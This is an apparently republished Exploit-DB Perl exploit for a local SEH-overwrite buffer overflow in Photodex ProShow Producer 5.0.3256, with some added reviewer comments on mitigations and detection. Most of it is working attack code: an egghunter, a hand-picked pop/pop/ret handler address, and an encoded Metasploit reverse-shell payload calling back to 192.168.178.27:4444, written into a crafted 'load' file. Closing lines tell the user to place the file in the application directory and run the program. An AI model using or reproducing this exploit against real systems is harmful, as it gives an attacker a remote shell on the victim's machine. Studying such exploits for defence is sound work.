Photodex ProShow Producer 5.0.3256 – Local Buffer Overflow

  • 作者: mr.pr0n
    日期: 2012-07-23
  • 来源:https://www.exploit-db.com/exploits/20036/
  • #######################################################################################
    # Exploit Title: Photodex ProShow Producer v5.0.3256 - Local Buffer Overflow Exploit
    # Date: 22/07/2012
    # Author: mr.pr0n (@_pr0n_)
    # Homepage: http://ghostinthelab.wordpress.com/
    # Software Link: http://files.photodex.com/release/pspro_50_3256.exe
    # Version: v5.0.3256
    # Tested on: Windows XP SP3
    # +-----------------------------------------------------+
    # | This vulnerability was discovered and researched 	|
    # | by Julien Ahrens [from Inshell]			|
    # | http://www.exploit-db.com/exploits/19563/		|
    # +-----------------------------------------------------+
    ######################################################################################
    
    # Proof-of-concept for a file-format (SEH overwrite) bug: the script only
    # writes a crafted "load" file to the current directory; the author's notes
    # below say proshow.exe picks that file up from its application directory.
    # Nothing is executed here, so the file content itself is the artifact a
    # defender would look for (a ~10 KB "load" file made mostly of 0x41 bytes).
    
    # The egghunter (author's label). Position-independent stub placed after the
    # SEH record; it carries the 4-byte tag "w00t" and, per the author's layout
    # below, locates the doubled tag "w00tw00t" that precedes $shellcode.
    # NOTE(review): the int 0x2e sequence is the classic NT syscall-based scan;
    # it is tied to the 32-bit Windows XP target named in the header.
    $egghunter=
    "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02".
    "\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
    "w00t". # <-- The 4 byte tag
    "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";
    
    # MSF windows/shell_reverse_tcp 
    # LHOST=192.168.178.27 LPORT=4444
    # Opaque, encoded Metasploit payload (bytes are not readable here).  Only the
    # author's note above gives its behaviour; the LHOST/LPORT pair is the network
    # indicator for this particular sample.
    $shellcode =
    "\xb8\x78\x6f\x18\xec\xdb\xcf\xd9\x74\x24\xf4\x5a\x31\xc9\xb1".
    "\x4f\x31\x42\x14\x83\xea\xfc\x03\x42\x10\x9a\x9a\xe4\x04\xd3".
    "\x65\x15\xd5\x83\xec\xf0\xe4\x91\x8b\x71\x54\x25\xdf\xd4\x55".
    "\xce\x8d\xcc\xee\xa2\x19\xe2\x47\x08\x7c\xcd\x58\xbd\x40\x81".
    "\x9b\xdc\x3c\xd8\xcf\x3e\x7c\x13\x02\x3f\xb9\x4e\xed\x6d\x12".
    "\x04\x5c\x81\x17\x58\x5d\xa0\xf7\xd6\xdd\xda\x72\x28\xa9\x50".
    "\x7c\x79\x02\xef\x36\x61\x28\xb7\xe6\x90\xfd\xa4\xdb\xdb\x8a".
    "\x1e\xaf\xdd\x5a\x6f\x50\xec\xa2\x23\x6f\xc0\x2e\x3a\xb7\xe7".
    "\xd0\x49\xc3\x1b\x6c\x49\x10\x61\xaa\xdc\x85\xc1\x39\x46\x6e".
    "\xf3\xee\x10\xe5\xff\x5b\x57\xa1\xe3\x5a\xb4\xd9\x18\xd6\x3b".
    "\x0e\xa9\xac\x1f\x8a\xf1\x77\x3e\x8b\x5f\xd9\x3f\xcb\x38\x86".
    "\xe5\x87\xab\xd3\x9f\xc5\xa3\x10\xad\xf5\x33\x3f\xa6\x86\x01".
    "\xe0\x1c\x01\x2a\x69\xba\xd6\x4d\x40\x7a\x48\xb0\x6b\x7a\x40".
    "\x77\x3f\x2a\xfa\x5e\x40\xa1\xfa\x5f\x95\x65\xab\xcf\x46\xc5".
    "\x1b\xb0\x36\xad\x71\x3f\x68\xcd\x79\x95\x1f\xca\xee\xd6\x88".
    "\x66\xf5\xbe\xca\x86\x1b\x63\x42\x60\x71\x8b\x02\x3b\xee\x32".
    "\x0f\xb7\x8f\xbb\x85\x5f\x33\x29\x42\x9f\x3a\x52\xdd\xc8\x6b".
    "\xa4\x14\x9c\x81\x9f\x8e\x82\x5b\x79\xe8\x06\x80\xba\xf7\x87".
    "\x45\x86\xd3\x97\x93\x07\x58\xc3\x4b\x5e\x36\xbd\x2d\x08\xf8".
    "\x17\xe4\xe7\x52\xff\x71\xc4\x64\x79\x7e\x01\x13\x65\xcf\xfc".
    "\x62\x9a\xe0\x68\x63\xe3\x1c\x09\x8c\x3e\xa5\x39\xc7\x62\x8c".
    "\xd1\x8e\xf7\x8c\xbf\x30\x22\xd2\xb9\xb2\xc6\xab\x3d\xaa\xa3".
    "\xae\x7a\x6c\x58\xc3\x13\x19\x5e\x70\x13\x08";
    
    
    $file		= "load"; # The "load" file 
    # Padding is sized so that tag + payload + padding total 9844 bytes, i.e. the
    # author's measured distance from the start of the file to the SEH record.
    # That figure is taken on trust from the page; it is not derived here.
    $junk 		= "\x41" x (9844 - length("w00tw00t") - length($shellcode));
    $nseh 	= "\xEB\x06\x90\x90"; # short jump 6 bytes
    # Overwritten handler address, from the author's comment: a pop/pop/ret gadget
    # in a module (if.dnt) that evidently lacks SafeSEH, so the hand-picked address
    # is honoured.  SafeSEH/SEHOP-enabled builds and DEP are the mitigations that
    # break exactly this step; a crash with an EXCEPTION_REGISTRATION record
    # pointing into file-controlled bytes is the detection signal.
    $seh		= "\x73\xb0\x22\x10"; # 0x1022b073 -p/p/r- [if.dnt]
    # Trailing NOP sled keeps the stub region a fixed 100 bytes regardless of
    # egghunter length.
    $nops		= "\x90" x (100 - length($egghunter));
    # File layout: [A*N][w00tw00t][shellcode][nSEH][SEH][4 NOPs][egghunter][NOPs]
    $exploit 	= $junk."w00tw00t".$shellcode.$nseh.$seh."\x90\x90\x90\x90".$egghunter.$nops;
    # NOTE(review): two-argument open with a bareword-style global handle and no
    # error check; if the directory is not writable the failure is silent and the
    # success banner below still prints.  Perl style would be
    # open(my $fh, '>', $file) or die "...".  Left unchanged here.
    open($File,">$file");
    print $File $exploit;
    close($File);
    print " \n[!] The 'load' file, was created successfully (".(length $exploit)." bytes) [!]\n\n";
    print "[+] Place the arbitrary 'load' file, into the application directory.\n";
    print "[+] Execute the application (proshow.exe) \n";